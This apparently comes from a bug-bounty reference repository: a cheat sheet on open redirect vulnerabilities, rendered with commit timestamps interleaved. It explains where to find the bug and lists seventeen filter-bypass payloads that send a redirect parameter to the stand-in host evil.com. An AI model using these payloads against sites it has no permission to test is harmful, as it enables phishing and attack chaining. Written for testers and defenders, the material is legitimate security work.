AllAboutBugBounty/Open Redirect.md

102 lines
2.2 KiB
Markdown
Raw Permalink Normal View History

2021-04-28 21:41:34 +00:00
## Open Redirect
2021-04-28 21:24:44 +00:00
2022-06-15 10:38:42 +00:00
## Introduction
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain
## Where to find
- Sometimes it can be found in login / register / logout pages
- Checking the javascript source code
## How to exploit
2021-04-28 21:41:34 +00:00
1. Try change the domain
2021-04-28 21:24:44 +00:00
```
2021-04-28 21:41:34 +00:00
/?redir=evil.com
2021-04-28 21:24:44 +00:00
```
2021-04-28 21:41:34 +00:00
2. Using a whitelisted domain or keyword
2021-04-28 21:24:44 +00:00
```
2021-04-28 21:41:34 +00:00
/?redir=target.com.evil.com
2021-04-28 21:24:44 +00:00
```
2021-04-28 21:41:34 +00:00
3. Using `//` to bypass `http` blacklisted keyword
2021-04-28 21:24:44 +00:00
```
2021-04-28 21:41:34 +00:00
/?redir=//evil.com
2021-04-28 21:24:44 +00:00
```
2021-04-28 21:41:34 +00:00
4. Using `https:` to bypass `//` blacklisted keyword
2021-04-28 21:24:44 +00:00
```
2021-04-28 21:41:34 +00:00
/?redir=https:evil.com
2021-04-28 21:24:44 +00:00
```
2021-04-28 21:41:34 +00:00
5. Using `\\` to bypass `//` blacklisted keyword
```
/?redir=\\evil.com
```
6. Using `\/\/` to bypass `//` blacklisted keyword
```
/?redir=\/\/evil.com/
/?redir=/\/evil.com/
```
7. Using `%E3%80%82` to bypass `.` blacklisted character
2021-04-28 21:24:44 +00:00
```
/?redir=evil。com
/?redir=evil%E3%80%82com
```
2021-04-28 21:41:34 +00:00
8. Using null byte `%00` to bypass blacklist filter
2021-04-28 21:24:44 +00:00
```
2021-04-28 21:41:34 +00:00
/?redir=//evil%00.com
2021-04-28 21:24:44 +00:00
```
2021-04-28 21:41:34 +00:00
9. Using parameter pollution
2021-04-28 21:24:44 +00:00
```
2021-04-28 21:41:34 +00:00
/?next=target.com&next=evil.com
2021-04-28 21:24:44 +00:00
```
2021-04-28 21:41:34 +00:00
10. Using `@` or `%40` character, browser will redirect to anything after the `@`
2021-04-28 21:24:44 +00:00
```
2021-04-28 21:41:34 +00:00
/?redir=target.com@evil.com
/?redir=target.com%40evil.com
2021-04-28 21:24:44 +00:00
```
2021-04-28 21:41:34 +00:00
11. Creating folder as their domain
2021-04-28 21:24:44 +00:00
```
http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com
```
2021-04-28 21:41:34 +00:00
12. Using `?` characted, browser will translate it to `/?`
2021-04-28 21:24:44 +00:00
```
2021-04-28 21:41:34 +00:00
/?redir=target.com?evil.com
2021-04-28 21:24:44 +00:00
```
2021-04-28 21:41:34 +00:00
13. Bypass the filter if it only checks for domain name using `%23`
```
/?redir=target.com%23evil.com
```
14. Host/Split Unicode Normalization
2021-04-28 21:24:44 +00:00
```
https://evil.c℀.example.com
```
2021-04-28 21:41:34 +00:00
15. Using parsing
2021-04-28 21:24:44 +00:00
```
http://ⓔⓥⓘⓛ.ⓒⓞⓜ
2021-04-28 21:41:34 +00:00
```
16. Using `°` symbol to bypass
```
/?redir=target.com/°evil.com
```
17. Bypass the filter if it only allows yoou to control the path using a nullbyte `%0d` or `%0a`
```
/?redir=/%0d/evil.com
2022-06-15 10:38:42 +00:00
```
## References
* [Hackerone #1250758](https://hackerone.com/reports/1250758)
* [@ahmadbrainworks](https://medium.com/@ahmadbrainworks/bug-bounty-how-i-earned-550-in-less-than-5-minutes-open-redirect-chained-with-rxss-8957979070e5)